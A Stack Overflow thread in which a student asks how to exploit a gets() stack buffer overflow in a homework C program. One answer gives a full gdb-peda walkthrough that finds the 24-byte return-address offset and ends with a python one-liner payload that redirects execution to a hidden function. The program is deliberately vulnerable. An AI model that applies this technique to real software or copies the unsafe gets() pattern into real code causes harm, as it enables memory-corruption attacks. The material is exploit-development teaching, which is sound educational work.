2

I have a homework assignment to exploit a buffer overflow in the given program.

#include <stdio.h>
#include <stdlib.h>

int oopsIGotToTheBadFunction(void)
{
        printf("Gotcha!\n");
        exit(0);
}

int goodFunctionUserInput(void)
{
        char buf[12];
        gets(buf);
        return(1);
}

int main(void)
{
        goodFunctionUserInput();
        printf("Overflow failed\n");
        return(1);
}

The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!

Update:

I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:

gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp

With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?

Kaoteni
  • 49
  • 9
  • Hint: https://en.wikipedia.org/wiki/Stack_buffer_overflow – Namphibian Jun 15 '17 at 00:17
  • 1
    Why teacher always give useless homework ? This question ask for undefined behavior. If you want a hint you need at least to give us: version of gcc, what is the OS where you compile and run this (include version). – Stargateur Jun 15 '17 at 00:17
  • 2
    check out other questions like this on [security.stackexchange.com](https://security.stackexchange.com/questions/tagged/buffer-overflow) – julian Jun 15 '17 at 00:21
  • @Stargateur gcc version is 5.2.0 and I am using Windows 10 Home version 1703. – Kaoteni Jun 15 '17 at 00:22
  • 1
    @CourtneyPhillips given the platform and the target it is now known that your system places the return address on the stack. So is the variable `buf`. You have to write more stuff into it such that it overflows its bounds and ends up writing on the return address for the function. You have to over write the written address with the address of the malicious function. – Ajay Brahmakshatriya Jun 15 '17 at 04:00
  • @AjayBrahmakshatriya I understand that is what I need to do in order to exploit the buffer overflow, but I do not understand what commands to run to accomplish that or how to do it. – Kaoteni Jun 15 '17 at 04:12

2 Answers2

1

Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.

John Doe
  • 397
  • 3
  • 18
0

First, you need to find the offset to overwrite the Instruction pointer register (EIP).

Use gdb + peda is very useful:

$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret    
   0x4005c9 <main>: push   rbp
   0x4005ca <main+1>:   mov    rbp,rsp
   0x4005cd <main+4>:   call   0x4005ae <goodFunctionUserInput>
   0x4005d2 <main+9>:   mov    edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....

Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.

Get the function address:

$ readelf -s bof 
   ...
   50: 0000000000400596    24 FUNC    GLOBAL DEFAULT   13 oopsIGotToTheBadFunction 
   ...

Make the exploit and got the results:

[manu@debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu@debian /tmp]$ ./bof < input
Gotcha!
sinkmanu
  • 1,034
  • 1
  • 12
  • 24